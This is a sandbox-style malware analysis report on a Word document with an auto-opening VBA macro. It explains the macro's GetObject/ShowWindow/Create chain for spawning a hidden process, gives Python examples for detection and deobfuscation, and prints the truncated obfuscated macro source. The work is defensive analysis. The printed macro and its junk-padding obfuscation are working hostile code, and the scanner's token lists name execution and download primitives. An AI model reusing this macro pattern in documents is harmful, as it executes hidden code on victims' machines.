Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1203 Exploitation for Client Execution
The sample is a malicious Word document carrying a VBA macro that runs as soon as the document is opened: the recovered module GQ4BBAG defines Sub autoopen(), and the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic confirms that the compiled p-code stream also pairs an auto-execution token with execution tokens, so the verdict does not depend on the source being recoverable. The extracted macros.bas concatenates three modules: WDZAAA (the ThisDocument class, VB_Base "1Normal.ThisDocument"), tAkZXAAC (a UserForm, recognisable by the "0{GUID}{GUID}" VB_Base) and GQ4BBAG, which holds the code. Inside autoopen() the real work is three statements buried in dead-code padding (If blocks that compare undeclared variables and assign to names nothing else reads): the macro calls GetObject on a string stored in a UserForm control property (tAkZXAAC.fAZDAQAA), sets the returned object's ShowWindow property to 0 (written as 894348 - 894348), and then calls GetObject(...).Create with a command line concatenated from further form properties, passing the first object as the third argument. GetObject with a moniker string resolves an automation object without a CreateObject call; a ShowWindow property followed by a four-argument Create is the shape of the WMI Win32_ProcessStartup / Win32_Process.Create idiom for spawning a hidden process, although the moniker strings themselves are not in the extracted VBA source because they live in the UserForm's property data. Given the download tokens flagged in the p-code, the spawned command is likely a downloader for a secondary payload, but the exact command line is not recoverable from this listing. Execution relies on the user enabling macros; the report shows no evidence of a parser exploit, so the T1203 mapping should be read as the analyzer's generic tag rather than a CVE attribution. The ClamAV signature Doc.Malware.Drsm-6931167-0 corroborates the verdict.
Heuristics (7)

- ClamAV: Doc.Malware.Drsm-6931167-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Drsm-6931167-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- GetObject call [high] OLE_VBA_GETOBJ: GetObject call
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (For this sample a VBA project was in fact recovered, see the extracted macros.bas below, so this marker adds nothing beyond the AutoOpen finding.)
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace URI that every drawing-bearing Office file carries, not a network indicator.
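The OLE_VBA_PCODE_AUTOEXEC_EXEC rule above is a co-occurrence check over raw compiled streams rather than over decoded source. As an added example that is not the analyzer's own code, the scanner below implements that rule: a stream is flagged only when an auto-execution token and an execution token both appear, matched case-insensitively in ASCII and in UTF-16LE, because compiled VBA name tables use both encodings. The token lists, stream names and stream contents are constructed for illustration and were not carved from this sample.

```python
import re

# Added example, not the analyzer's code: the co-occurrence rule described for
# OLE_VBA_PCODE_AUTOEXEC_EXEC. Token lists are illustrative, not the analyzer's.
AUTOEXEC_TOKENS = ("AutoOpen", "AutoExec", "AutoClose", "Auto_Open",
                   "Document_Open", "Workbook_Open")
EXEC_TOKENS = ("Shell", "WScript.Shell", "CreateObject", "GetObject",
               "URLDownloadToFile", "XMLHTTP", "Win32_Process", "ShowWindow")


def find_tokens(data: bytes, tokens) -> set:
    """Return the tokens present in a raw stream, case-insensitively, in either
    ASCII or UTF-16LE. Compressed source is not decoded here; the point of the
    heuristic is to catch identifiers stored as plain strings in compiled streams."""
    hits = set()
    for tok in tokens:
        for enc in ("ascii", "utf-16-le"):
            if re.search(re.escape(tok.encode(enc)), data, re.IGNORECASE):
                hits.add(tok)
                break
    return hits


def pcode_autoexec_exec(data: bytes) -> bool:
    """The heuristic proper: an auto-exec token AND an execution token in one stream."""
    return bool(find_tokens(data, AUTOEXEC_TOKENS)) and bool(find_tokens(data, EXEC_TOKENS))


def triage_streams(streams: dict) -> dict:
    """Apply the rule to every stream of a VBA project (name -> bytes) and report
    which tokens fired, so the analyst can see why a stream was flagged."""
    report = {}
    for name, data in streams.items():
        auto = find_tokens(data, AUTOEXEC_TOKENS)
        exe = find_tokens(data, EXEC_TOKENS)
        if auto and exe:
            report[name] = {"autoexec": sorted(auto), "exec": sorted(exe)}
    return report


# Constructed stand-ins for compiled VBA streams (not carved from the real sample):
# one name table with UTF-16LE identifiers, one module with ASCII p-code strings,
# and two streams that each satisfy only half of the rule.
SAMPLE_STREAMS = {
    "VBA/_VBA_PROJECT": b"\x00" * 8 + "autoopen".encode("utf-16-le") + b"\x00\x00"
                        + "GetObject".encode("utf-16-le") + b"\x00\x00"
                        + "ShowWindow".encode("utf-16-le"),
    "VBA/GQ4BBAG": b"\x01\x02AUTOOPEN\x00\x03getobject\x00",
    # Auto-exec name but no execution primitive: not flagged.
    "VBA/ThisDocument": b"Document_Open\x00MsgBox\x00",
    # Execution primitive but no auto-exec entry point: needs user interaction.
    "VBA/Module1": b"Sub Run()\x00CreateObject\x00",
}

if __name__ == "__main__":
    for name, why in triage_streams(SAMPLE_STREAMS).items():
        print(name, why)
```

Only the two streams that carry both halves of the rule are reported; the per-stream token lists are what an analyst needs when deciding whether a hit is a genuine downloader or a false positive such as a benign Document_Open handler that merely calls Shell to open a help file.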
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12930 bytes | 9beeb52075c9b54285be2f34dbe53b1e7183d443772ab82e1ae675b30b3df91c |
Preview script (first 1,000 lines of the extracted script; the listing is cut off below)

```vb
Attribute VB_Name = "WDZAAA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "tAkZXAAC"
Attribute VB_Base = "0{27559CE0-4ADD-4651-8A72-5EF4E7B87ED4}{2B9866C6-C610-41B4-855E-D879134083F9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "GQ4BBAG"
Sub autoopen()
On Error Resume Next
If YADZ1CAA = C_koXAox Then
HQoXCcA = 949716526 - SAcAABG
L14AAU = bBAwDB + Oct(v_oB1ZB1) / 103137739 * 476416608
Set QAAG1Ak = lB_ACAk
zAAxwk = (774912242 + 12987836 * X1UBAUAA + CInt(214769836) + jAQAX4UQ / mQc_BA1)
u1QUAwx = 250863470
End If
If cAGoA_AA = ZDQcAGU Then
DDcQck = 517508998 - McGX4wC
FAc_X4A = vAAkAD + Oct(sBUGQA) / 948888026 * 268107932
Set z1ZQAB = Qw4AU_B
t1kABX1 = (378022218 + 379747760 * RDxX4Zkk + CInt(745173365) + VCQQQUC / EowDcA)
GXAGDD1 = 957844032
End If
If IkG4ZB = r4AcA1Q Then
FGAAkCA = 187959857 - Z_AcUxDA
PkXc_AA = wACZQQA + Oct(DXUUwA) / 510838716 * 869933082
Set icAkwDA = IGB1D4A
zk_wDAD = (358716164 + 183140443 * dZ4DxwBZ + CInt(193310753) + mQGZAw / pAccAA)
jXAoAAD = 939460184
End If
Set OXwACX_ = GetObject(tAkZXAAC.fAZDAQAA)
If JADZBAAk = G_CGCAB Then
PAoACQZA = 259727621 - YBACQCxG
QAoQBA = jUA1B4 + Oct(fUCAXA) / 595795163 * 801833251
Set dckcAA = zAx1DkA
qAX11Aw = (352885041 + 610447034 * GZADAB + CInt(852755668) + kAABA4 / RAAABw)
oxADoA = 442408147
End If
If IQZQAoUB = iZABCA Then
RABAAo = 718995697 - iAwAADG
QBQBA4 = KAAAZDA + Oct(scAoAA) / 681636774 * 298105799
Set w1AkCXA4 = ZDwCwGD
EBAADZ = (697545678 + 259143160 * oDQGGokA + CInt(511079189) + tQAAAA / icAAcxU)
K4AAXAA = 379605263
End If
If OA4xGAAQ = bQUADX Then
MABG_GBx = 133074579 - j_QUBA
L_1U1A1A = dQAAUA4 + Oct(iAAAkc1) / 332152410 * 778723251
Set rAcwAU = cAXAZB
zoA_AA = (324568078 + 789165252 * qXAc1Z + CInt(526513862) + mQA_AUZ / UZADBUA)
O1XZXA = 190851030
End If
OXwACX_.ShowWindow = 894348 - 894348
If NGXZAkDG = CUAAX4cZ Then
EAUwCAkA = 897965360 - qwAUDQ
qkDwUw = dAAAXAA + Oct(wcQAxXQ) / 155181644 * 580970701
Set MAAAUU = AZxxoABA
DZAXXUBA = (875305154 + 807337377 * DkcoAC + CInt(597511585) + pABAcCc / XAAXQAUA)
ZAQXAA_ = 902660714
End If
If sxADA_k = hcGUAC Then
jXQQQA = 53836548 - zUAAAB
EUCwGAo = BBAABQwA + Oct(uAAoG_A) / 517179942 * 387326010
Set uAAAAQAA = jAQkXGBU
ZoADAQQ = (283683574 + 773266364 * ZwAkUAxA + CInt(980417349) + wAw4QA_Q / Jc_xAD)
AAAZXXBc = 995651421
End If
If MBAXxc = jwAAckAQ Then
cXZUDQ = 946798449 - sAxUX_
GoCQUUAB = bAAQ1ck + Oct(hB_1ADA) / 596669736 * 253066424
Set MDAwZAAG = kQXcAAAA
PAxUAG = (581362481 + 688120926 * pQXDAXU + CInt(508201260) + SAwGC11 / mBAAAQAA)
rDCwGc = 156267673
End If
GetObject(tAkZXAAC.QAAwAAA1).Create% jAo_AA + tAkZXAAC.FXBXZAQD + K_4UADZ + tAkZXAAC.mA_AADD + iAZXZXZX + tAkZXAAC.WAQDBwA + iAQACG, OAAABAQw, OXwACX_, w_AADB1A
If RXDDoAAU = C_GQ1X Then
BCAABBxA = 168386157 - VkXXQ1B
zAXxwUQk = rwAX_AQQ + Oct(RABUXDAo) / 287978487 * 904750880
Set XBBQAwBX = FAA1DCUk
wCDQUZBA = (487132587 + 909042658 * jkQQAU1 + CInt(281592087) + C_AAAox / IA_AQX)
MUAUoA = 689042967
End If
If IAAAQA = RkGGUQUA Then
hAXUQUU = 404696370 - Dx_ZAwAD
uAko1Qo = kDA1AACA + Oct(EADxA41) / 658690521 * 183236645
Set ZDADAw = WxBB4A
mAGAU4A = (817045454 + 508840172 * jAckUAA + CInt(208041784) + wG4xZcZ / nUDCB4)
noQkBw = 822766977
End If
If lDAAkDQ = lAAxADU_ Then
Do_AAAZx =
```
... (truncated)
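Most of the listing above is padding: each If block compares two undeclared variables (Empty = Empty, which is True, so the body does run) and assigns to names that nothing else ever reads, while the three statements that matter sit between the blocks. As an added example that is neither the analyzer's output nor the sample's own code, the cleanup pass below strips that padding and folds the self-cancelling arithmetic so the execution chain can be read directly. SAMPLE is a constructed excerpt that keeps the shape and identifiers of the recovered autoopen() routine but shortens the junk blocks; the set of auto-exec names is an assumption chosen for the example.

```python
import re

# Added example, not the analyzer's code and not the malware's code. SAMPLE is a
# constructed excerpt modelled on the recovered autoopen() routine.
SAMPLE = """Sub autoopen()
On Error Resume Next
If YADZ1CAA = C_koXAox Then
HQoXCcA = 949716526 - SAcAABG
L14AAU = bBAwDB + Oct(v_oB1ZB1) / 103137739 * 476416608
Set QAAG1Ak = lB_ACAk
u1QUAwx = 250863470
End If
Set OXwACX_ = GetObject(tAkZXAAC.fAZDAQAA)
If IQZQAoUB = iZABCA Then
RABAAo = 718995697 - iAwAADG
End If
OXwACX_.ShowWindow = 894348 - 894348
GetObject(tAkZXAAC.QAAwAAA1).Create% jAo_AA + tAkZXAAC.FXBXZAQD + K_4UADZ, OAAABAQw, OXwACX_, w_AADB1A
End Sub
"""

AUTOEXEC_NAMES = {"autoopen", "autoexec", "autoclose", "auto_open",
                  "document_open", "workbook_open"}  # assumed list for the example
EXEC_RE = re.compile(r"GetObject|CreateObject|\bShell\b|\.Create\b|ShowWindow", re.I)
IF_RE = re.compile(r"^If\s+(\w+)\s*=\s*(\w+)\s+Then$", re.I)
ASSIGN_RE = re.compile(r"^(?:Set\s+)?(\w+)\s*=", re.I)


def entry_points(src: str) -> list:
    """Sub/Function names that Office runs without user interaction."""
    names = re.findall(r"^(?:(?:Private|Public)\s+)?(?:Sub|Function)\s+(\w+)",
                       src, re.M | re.I)
    return [n for n in names if n.lower() in AUTOEXEC_NAMES]


def _blocks(lines):
    """Yield (start, end) index pairs of top-level If ... End If blocks."""
    depth, start = 0, None
    for i, line in enumerate(lines):
        if re.match(r"^If\b.*\bThen$", line, re.I):
            if depth == 0:
                start = i
            depth += 1
        elif re.match(r"^End If$", line, re.I):
            depth -= 1
            if depth == 0:
                yield start, i


def _is_junk(lines, start, end):
    """Padding: the condition compares two bare identifiers and the body only
    assigns to names that no line outside the block references. Such a block
    executes under On Error Resume Next but cannot affect anything else."""
    if not IF_RE.match(lines[start]):
        return False
    assigned = []
    for line in lines[start + 1:end]:
        m = ASSIGN_RE.match(line)
        if not m:
            return False
        assigned.append(m.group(1))
    outside = "\n".join(lines[:start] + lines[end + 1:])
    return not any(re.search(r"\b%s\b" % re.escape(n), outside) for n in assigned)


def fold_constants(line: str) -> str:
    """Fold N - N, the author's way of writing a literal 0 (ShowWindow = 0)."""
    return re.sub(r"\b(\d+)\s*-\s*\1\b", "0", line)


def deobfuscate(src: str) -> list:
    """Return the routine with junk blocks removed and constants folded."""
    lines = [l.strip() for l in src.strip().splitlines()]
    drop = set()
    for start, end in _blocks(lines):
        if _is_junk(lines, start, end):
            drop.update(range(start, end + 1))
    return [fold_constants(l) for i, l in enumerate(lines) if i not in drop]


def exec_lines(src: str) -> list:
    """Cleaned lines that reach an object-execution primitive."""
    return [l for l in deobfuscate(src) if EXEC_RE.search(l)]


if __name__ == "__main__":
    print("auto-exec entry points:", entry_points(SAMPLE))
    print("\n".join(deobfuscate(SAMPLE)))
```

What survives is the chain GetObject(form property) into a startup object, ShowWindow = 0, then GetObject(form property).Create with the command line, the startup object and an out-parameter. The strings passed to GetObject and the command line itself are not in macros.bas; they are control properties of the UserForm tAkZXAAC, so the next step is to dump that form's storage from the OLE file (olevba reports UserForm strings alongside the macro source, and oledump can extract the form stream) rather than trying to reconstruct the command from the VBA alone.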